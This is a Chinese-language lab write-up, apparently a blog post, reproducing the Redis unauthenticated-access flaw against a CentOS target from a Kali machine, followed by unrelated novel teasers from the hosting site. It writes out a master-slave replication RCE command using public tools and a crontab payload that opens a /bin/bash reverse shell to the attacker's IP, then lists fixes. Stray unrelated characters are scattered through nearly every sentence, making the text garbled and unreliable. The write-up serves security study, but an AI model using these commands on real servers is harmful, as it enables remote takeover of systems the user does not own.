redis未授權(quán)訪問漏洞復(fù)現(xiàn)

漏洞描述

Redis默認情況下届巩,會綁定在0.0.0.0:6379(在redis3.2之后硅瞧,redis增加了protected-mode,在這個模式下姆泻,非綁定IP或者沒有配置密碼訪問時都會報錯)零酪,如果沒有進行采用相關(guān)的策略,比如添加防火墻規(guī)則避免其他非信任來源ip訪問等等拇勃,這樣將會將Redis服務(wù)暴露在公網(wǎng)上四苇,如果在沒有設(shè)置密碼認證(默認為空)的情況下,會導致任意用戶在可以訪問目標服務(wù)器的情況下未授權(quán)訪問Redis以及讀取Redis的數(shù)據(jù)方咆。攻擊者在未授權(quán)訪問Redis的情況下月腋,利用Redis自身的提供的config命令,可以進行寫文件操作瓣赂,攻擊者還可以成功將自己的ssh公鑰寫入目標服務(wù)器的/root/.ssh文件的authotrized_keys 文件中榆骚,進而可以使用對應(yīng)私鑰直接使用ssh服務(wù)器登錄目標服務(wù)器。

漏洞的產(chǎn)生條件有以下兩點:

(1)??? Redis綁定在0.0.0.0:6379,且沒有進行添加防火墻規(guī)則避免其他非信任來源ip訪問等相關(guān)安全策略煌集,直接暴露在公網(wǎng)

(2)??? 沒有設(shè)置密碼認證(默認為空)或者弱密碼妓肢,可以免密碼登錄redis服務(wù)

影響版本

Redis 2.x,3.x苫纤,4.x碉钠,5.x

漏洞危害

(1) 攻擊者無需認證訪問到內(nèi)部數(shù)據(jù),可能導致敏感信息泄露纲缓,黑客也可以惡意執(zhí)行flushall來清空所有數(shù)據(jù)

(2) 攻擊者可通過eval執(zhí)行l(wèi)ua代碼,或通過數(shù)據(jù)備份功能往磁盤寫入后門文件

(3) 如果redis以root身份運行喊废,黑客可以給root賬戶寫入SSH公鑰文件祝高,直接通過SSH登錄目標服務(wù)器

漏洞環(huán)境

服務(wù)端:centos 7? 192.168.220.131

客戶端:kali 192.168.220.134

服務(wù)端準備:

客戶端準備:

(1)安裝redis-cli

1.下載redis-cli:wget http://download.redis.io/releases/redis-4.0.10.tar.gz

下載redis-cli

2.解壓:

解壓

3.編譯:

編譯

漏洞復(fù)現(xiàn)

方法一:利用主從復(fù)制rce

漏洞存在于4.x、5.x版本中污筷,Redis提供了主從模式工闺,主從模式指使用一個redis作為主機,其他的作為備份機瓣蛀,主機從機數(shù)據(jù)都是一樣的陆蟆,從機只負責讀,主機只負責寫揪惦。在Reids 4.x之后遍搞,通過外部拓展罗侯,可以實現(xiàn)在redis中實現(xiàn)一個新的Redis命令器腋,構(gòu)造惡意.so文件。在兩個Redis實例設(shè)置主從模式的時候钩杰,Redis的主機實例可以通過FULLRESYNC同步文件到從機上纫塌。然后在從機上加載惡意so文件,即可執(zhí)行命令讲弄。

需要利用一個工具措左,GitHub下載即可。

1)git clone?https://github.com/n0b0dyCN/RedisModules-ExecuteCommand(需要make)

2)git clone?https://github.com/Ridter/redis-rce.git

安裝RedisModules-ExecuteCommand

make進src目錄make避除,不進也可以怎披。

安裝:redis-rce

步驟:

首先:測試目標靶機是否存在未授權(quán)訪問,下圖說明靶機存在未授權(quán)訪問,導致信息泄露瓶摆×构洌可以看到版本:4.0.14步驟:

然后利用RedisModules-ExecuteCommand?make生成一個module.so

利用主從復(fù)制rce獲取shell:

攻擊端執(zhí)行:python redis-rce.py -r 目標ip-p 目標端口 -L 本地ip -f 惡意.so

獲取shell。

方法二:在crontab里寫定時任務(wù),反彈shell

1.在客戶端開啟監(jiān)聽(kali攻擊機)

2.在客戶端(kali攻擊機)使用redis-cli連接redis服務(wù)器群井,寫入反彈shell

set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.220.134/9999 0>&1\n\n"

config set dir /var/spool/cron

config set dbfilename root

save

保存失斪捶伞:我也不知道啥原因,知道的大佬請指教书斜。原理保存成功后過一分鐘就會反彈shell诬辈。可能是我之前輸入錯誤的原因荐吉。

漏洞修復(fù):

1焙糟、禁止外部訪問Redis服務(wù)端口

2、禁止使用root權(quán)限啟動redis服務(wù)

3样屠、配置安全組穿撮,限制可連接Redis服務(wù)器的IP

參考鏈接:

https://www.cnblogs.com/yuzly/p/11663822.html

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末搓劫,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子混巧,更是在濱河造成了極大的恐慌枪向,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,386評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件咧党,死亡現(xiàn)場離奇詭異秘蛔,居然都是意外死亡,警方通過查閱死者的電腦和手機傍衡,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,142評論 3 394
  • 文/潘曉璐 我一進店門深员,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人蛙埂,你說我怎么就攤上這事倦畅。” “怎么了绣的?”我有些...
    開封第一講書人閱讀 164,704評論 0 353
  • 文/不壞的土叔 我叫張陵叠赐,是天一觀的道長。 經(jīng)常有香客問我屡江,道長芭概,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,702評論 1 294
  • 正文 為了忘掉前任惩嘉,我火速辦了婚禮罢洲,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘文黎。我一直安慰自己惹苗,他們只是感情好,可當我...
    茶點故事閱讀 67,716評論 6 392
  • 文/花漫 我一把揭開白布耸峭。 她就那樣靜靜地躺著桩蓉,像睡著了一般。 火紅的嫁衣襯著肌膚如雪抓艳。 梳的紋絲不亂的頭發(fā)上触机,一...
    開封第一講書人閱讀 51,573評論 1 305
  • 那天,我揣著相機與錄音玷或,去河邊找鬼儡首。 笑死,一個胖子當著我的面吹牛偏友,可吹牛的內(nèi)容都是我干的蔬胯。 我是一名探鬼主播,決...
    沈念sama閱讀 40,314評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼位他,長吁一口氣:“原來是場噩夢啊……” “哼氛濒!你這毒婦竟也來了产场?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,230評論 0 276
  • 序言:老撾萬榮一對情侶失蹤舞竿,失蹤者是張志新(化名)和其女友劉穎京景,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體骗奖,經(jīng)...
    沈念sama閱讀 45,680評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡确徙,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,873評論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了执桌。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片鄙皇。...
    茶點故事閱讀 39,991評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖仰挣,靈堂內(nèi)的尸體忽然破棺而出伴逸,到底是詐尸還是另有隱情,我是刑警寧澤膘壶,帶...
    沈念sama閱讀 35,706評論 5 346
  • 正文 年R本政府宣布错蝴,位于F島的核電站,受9級特大地震影響香椎,放射性物質(zhì)發(fā)生泄漏漱竖。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,329評論 3 330
  • 文/蒙蒙 一畜伐、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧躺率,春花似錦玛界、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,910評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至后添,卻和暖如春笨枯,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背遇西。 一陣腳步聲響...
    開封第一講書人閱讀 33,038評論 1 270
  • 我被黑心中介騙來泰國打工馅精, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人粱檀。 一個月前我還...
    沈念sama閱讀 48,158評論 3 370
  • 正文 我出身青樓洲敢,卻偏偏與公主長得像,于是被迫代替她去往敵國和親茄蚯。 傳聞我的和親對象是個殘疾皇子压彭,可洞房花燭夜當晚...
    茶點故事閱讀 44,941評論 2 355

推薦閱讀更多精彩內(nèi)容